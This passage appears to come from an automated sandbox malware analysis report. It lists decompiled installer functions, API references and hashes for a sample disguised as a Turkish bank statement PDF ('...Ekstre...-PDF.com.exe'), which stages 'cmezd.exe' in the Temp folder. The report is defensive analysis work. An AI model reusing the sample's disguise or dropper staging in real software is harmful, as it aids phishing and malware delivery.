                                                                                              0x0040520c
                                                                                              0x00405217
                                                                                              0x00405217
                                                                                              0x004051e0
                                                                                              0x0040524f
                                                                                              0x00405250
                                                                                              0x0040525c
                                                                                              0x0040525c
                                                                                              0x00405268
                                                                                              0x00405283
                                                                                              0x00405286
                                                                                              0x004052a3
                                                                                              0x00000000
                                                                                              0x00405288
                                                                                              0x0040528d
                                                                                              0x00405296
                                                                                              0x00405629
                                                                                              0x0040563b
                                                                                              0x0040563b
                                                                                              0x00405286
                                                                                              0x00000000
                                                                                              0x00405268
                                                                                              0x0040519a

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 00405049
                                                                                              • GetDlgItem.USER32 ref: 00405054
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                              • LoadImageW.USER32 ref: 004050B5
                                                                                              • SetWindowLongW.USER32 ref: 004050CE
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                              • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                              • SetWindowLongW.USER32 ref: 0040527D
                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                              • GlobalFree.KERNEL32 ref: 0040546B
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                              • GetDlgItem.USER32 ref: 00405620
                                                                                              • ShowWindow.USER32(00000000), ref: 00405627
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 2564846305-813528018
                                                                                              • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                              • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                              • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                              • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                                                              0x00404795
                                                                                              0x004048c2
                                                                                              0x0040491f
                                                                                              0x00404923
                                                                                              0x004049f0
                                                                                              0x004049f2
                                                                                              0x004049f2
                                                                                              0x004049f8
                                                                                              0x004049f8
                                                                                              0x004049fb
                                                                                              0x00000000
                                                                                              0x00404a02
                                                                                              0x00404931
                                                                                              0x00404937
                                                                                              0x00404941
                                                                                              0x0040494c
                                                                                              0x0040494f
                                                                                              0x00404952
                                                                                              0x0040495d
                                                                                              0x00404960
                                                                                              0x00404967
                                                                                              0x00404974
                                                                                              0x00404985
                                                                                              0x0040498b
                                                                                              0x00404993
                                                                                              0x004049a1
                                                                                              0x004049a7
                                                                                              0x004049a7
                                                                                              0x00404967
                                                                                              0x004049b1
                                                                                              0x00000000
                                                                                              0x004049bc
                                                                                              0x004049c0
                                                                                              0x004049d0
                                                                                              0x004049d0
                                                                                              0x004049d6
                                                                                              0x004049e2
                                                                                              0x004049e2
                                                                                              0x00000000
                                                                                              0x004049e6
                                                                                              0x004049b1
                                                                                              0x004048cd
                                                                                              0x00000000
                                                                                              0x004048df
                                                                                              0x004048e4
                                                                                              0x004048ea
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404913
                                                                                              0x00404915
                                                                                              0x0040491a
                                                                                              0x00000000
                                                                                              0x0040491a
                                                                                              0x004048cd
                                                                                              0x0040479b
                                                                                              0x0040479e
                                                                                              0x004047a3
                                                                                              0x004047b4
                                                                                              0x004047b4
                                                                                              0x004047bc
                                                                                              0x004047bf
                                                                                              0x004047c3
                                                                                              0x004047c6
                                                                                              0x004047ca
                                                                                              0x004047cd
                                                                                              0x004047d0
                                                                                              0x004047d3
                                                                                              0x004047da
                                                                                              0x004047dc
                                                                                              0x004047dc
                                                                                              0x004047e6
                                                                                              0x004047f3
                                                                                              0x004047fd
                                                                                              0x00404802
                                                                                              0x00404805
                                                                                              0x0040480a
                                                                                              0x00404821
                                                                                              0x00404828
                                                                                              0x0040483b
                                                                                              0x0040483e
                                                                                              0x00404852
                                                                                              0x00404859
                                                                                              0x0040485e
                                                                                              0x00404863
                                                                                              0x00404863
                                                                                              0x00404871
                                                                                              0x0040487f
                                                                                              0x00404891
                                                                                              0x00404896
                                                                                              0x004048a6
                                                                                              0x004048a8
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                                              • GetDlgItem.USER32 ref: 00404835
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                              • GetSysColor.USER32(?), ref: 00404863
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                              • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                              • GetDlgItem.USER32 ref: 004048FF
                                                                                              • SendMessageW.USER32(00000000), ref: 00404906
                                                                                              • GetDlgItem.USER32 ref: 00404931
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                              • SetCursor.USER32(00000000), ref: 00404985
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                              • SetCursor.USER32(00000000), ref: 004049A1
                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                              Strings
                                                                                              • "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p, xrefs: 00404960
                                                                                              • N, xrefs: 0040491F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p$N
                                                                                              • API String ID: 3103080414-1971594947
                                                                                              • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                              • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                              • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                              • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                              0x004062ae
                                                                                              0x004062b7
                                                                                              0x004062be
                                                                                              0x004062c8
                                                                                              0x004062dc
                                                                                              0x00406304
                                                                                              0x0040630b
                                                                                              0x0040630f
                                                                                              0x00406313
                                                                                              0x00406333
                                                                                              0x0040633a
                                                                                              0x00406344
                                                                                              0x00406351
                                                                                              0x00406356
                                                                                              0x0040635b
                                                                                              0x0040635f
                                                                                              0x0040636e
                                                                                              0x00406370
                                                                                              0x0040637d
                                                                                              0x00406381
                                                                                              0x0040641c
                                                                                              0x00000000
                                                                                              0x00406397
                                                                                              0x004063a4
                                                                                              0x004063c8
                                                                                              0x004063cc
                                                                                              0x004063eb
                                                                                              0x004063ef
                                                                                              0x004063ef
                                                                                              0x004063f1
                                                                                              0x004063fa
                                                                                              0x00406405
                                                                                              0x00406410
                                                                                              0x00406416
                                                                                              0x00000000
                                                                                              0x00406416
                                                                                              0x004063ce
                                                                                              0x004063d1
                                                                                              0x004063dc
                                                                                              0x004063d8
                                                                                              0x004063da
                                                                                              0x004063db
                                                                                              0x004063db
                                                                                              0x004063e3
                                                                                              0x004063e5
                                                                                              0x00000000
                                                                                              0x004063e5
                                                                                              0x004063af
                                                                                              0x004063b5
                                                                                              0x00000000
                                                                                              0x004063b5
                                                                                              0x00406381
                                                                                              0x0040635f
                                                                                              0x004062de
                                                                                              0x004062e9
                                                                                              0x004062f2
                                                                                              0x004062f6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004062f6
                                                                                              0x00406427

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                              • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                              • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                                                              • wsprintfA.USER32 ref: 0040632D
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                              • GlobalFree.KERNEL32 ref: 00406416
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                              • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                              • API String ID: 2171350718-2295842750
                                                                                              • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                              • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                              • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                              • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 90%
                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                              0x0040100a
                                                                                              0x00401039
                                                                                              0x00401047
                                                                                              0x0040104d
                                                                                              0x00401051
                                                                                              0x0040105b
                                                                                              0x00401061
                                                                                              0x00401064
                                                                                              0x004010f3
                                                                                              0x00401089
                                                                                              0x0040108c
                                                                                              0x004010a6
                                                                                              0x004010bd
                                                                                              0x004010cc
                                                                                              0x004010cf
                                                                                              0x004010d5
                                                                                              0x004010d9
                                                                                              0x004010e4
                                                                                              0x004010ed
                                                                                              0x004010ef
                                                                                              0x004010ef
                                                                                              0x00401100
                                                                                              0x00401105
                                                                                              0x0040110d
                                                                                              0x00401110
                                                                                              0x00401112
                                                                                              0x00401118
                                                                                              0x0040111f
                                                                                              0x00401126
                                                                                              0x00401130
                                                                                              0x00401142
                                                                                              0x00401156
                                                                                              0x00401160
                                                                                              0x00401165
                                                                                              0x00401165
                                                                                              0x00401110
                                                                                              0x0040116e
                                                                                              0x00000000
                                                                                              0x00401178
                                                                                              0x00401010
                                                                                              0x00401013
                                                                                              0x00401015
                                                                                              0x0040101f
                                                                                              0x0040101f
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32 ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                              • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                              • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                              • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
